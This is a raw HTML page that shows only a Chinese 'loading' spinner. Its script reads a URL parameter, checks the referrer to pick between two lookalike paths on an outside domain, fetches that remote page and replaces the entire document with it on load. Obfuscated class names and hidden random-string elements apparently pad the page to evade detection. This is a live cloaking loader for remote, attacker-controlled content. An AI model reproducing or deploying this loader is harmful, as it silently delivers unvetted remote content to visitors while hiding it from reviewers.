<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .eqVvr0m8MIx {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .eqVvr0m8MIx .l9Vl2FhO {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .eqVvr0m8MIx .content {
            line-height: 50px;
            text-align: center
        }

        .eqVvr0m8MIx .img {
            width: 100%
        }

        .eqVvr0m8MIx .uTboQoH5d1 {
            text-align: center
        }

        .eqVvr0m8MIx .uTboQoH5d1 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .eqVvr0m8MIx .uTboQoH5d1 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .eqVvr0m8MIx .uTboQoH5d1 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .eqVvr0m8MIx .uTboQoH5d1 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .eqVvr0m8MIx .uTboQoH5d1 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .eqVvr0m8MIx .uTboQoH5d1 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .eqVvr0m8MIx .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function owtYnCXvkzljh(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var IziDM = owtYnCXvkzljh('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ IziDM +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ IziDM +".html?a=share";
		}
		
        vIA4nb=url+"#"+new Date().getTime();
        vIA4nb && function() {
            $.get(vIA4nb, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>xSXoLssaOy7kYo</p>
<h1 style='display:none' >nrJqI3pzEclG4ki2boy7ocLA97PxZmIN2ZUuViNS1UzSTLs2JxN4Ytfyo4kYuK5FUXLB</h1>
<h1 style='display:none' >nrJqI3pzEclG4ki2boy7ocLA97PxZmIN2ZUuViNS1UzSTLs2JxN4Ytfyo4kYuK5FUXLB</h1>
<a  href='#' style='display:none'>uIBuRq3KPmVDyhGx36UjyLzaJhcuTJ67PcM0i48fQ9A4fakjmOWxnv7JIQiDnvv2jxw1TccQ1rVslg8oNg</a>
<div style='display:none'>VCyZG2loorlEJB26HiKDuYZmi</div>
<h1 style='display:none' >nrJqI3pzEclG4ki2boy7ocLA97PxZmIN2ZUuViNS1UzSTLs2JxN4Ytfyo4kYuK5FUXLB</h1>
<div style='display:none'>VCyZG2loorlEJB26HiKDuYZmi</div>
<b style='display:none' >jodrFGanSaCqdvDv8kAgi7TxlAkW7QUwmgzg73WuKQ6wYsaOwK6eE0711rGeS0</b>
<a  href='#' style='display:none'>uIBuRq3KPmVDyhGx36UjyLzaJhcuTJ67PcM0i48fQ9A4fakjmOWxnv7JIQiDnvv2jxw1TccQ1rVslg8oNg</a><div class="eqVvr0m8MIx">
    <div class="l9Vl2FhO">
        <div class="uTboQoH5d1">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<div style='display:none'>i4jx2a8ynctzyFb3g6DcGXP0Nk3U</div>
<a  href='#' style='display:none'>kemD63tNPtiJPUJ77whnOcNadlBIbGidFDggq5hUi3tgHidxA8hziyhHktKI5VrO</a>
<a  href='#' style='display:none'>kemD63tNPtiJPUJ77whnOcNadlBIbGidFDggq5hUi3tgHidxA8hziyhHktKI5VrO</a>
<div style='display:none'>i4jx2a8ynctzyFb3g6DcGXP0Nk3U</div>
<b style='display:none' >O3wBuer4VmDLn4Qu2C65yKk77BeypV4QqEKwQmOSmAofG7ae2ImjMmsJgVH1rYnPz1QVIGekjAyCLi4CZXKIpaY8JNQ5U3Vpmn</b>
<img  src='' style='display:none'>
<li style='display:none' >eMK2S3O7ZHheZfQ9VFN8QCfi1L07rDDPFkPMpA</li>
<li style='display:none' >eMK2S3O7ZHheZfQ9VFN8QCfi1L07rDDPFkPMpA</li></body>
</html>